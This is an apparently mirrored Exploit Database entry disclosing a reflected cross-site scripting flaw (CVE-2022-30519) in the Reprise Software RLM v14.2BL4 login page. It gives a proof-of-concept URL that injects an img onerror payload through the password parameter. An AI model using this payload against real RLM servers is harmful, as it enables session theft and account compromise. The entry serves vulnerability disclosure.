Reprise Software RLM v14.2BL4 – Cross-Site Scripting (XSS)

• Exploit Database
• 32 阅读

• 作者： Mohammed A.Siledar
  日期： 2023-04-01
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51188/

• # Exploit Title:Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
  # Exploit Author: Mohammed A.Siledar
  # Author Company : reprisesoftware
  # Version: rlm.v14.2BL4
  # Vendor home page : https://reprisesoftware.com
  # Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
  # Authentication Required: No
  # CVE : CVE-2022-30519
  # Tested on: Windows 10
  
  # Proof Of Concept: 
  
  http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E
  
  
  Best Regards.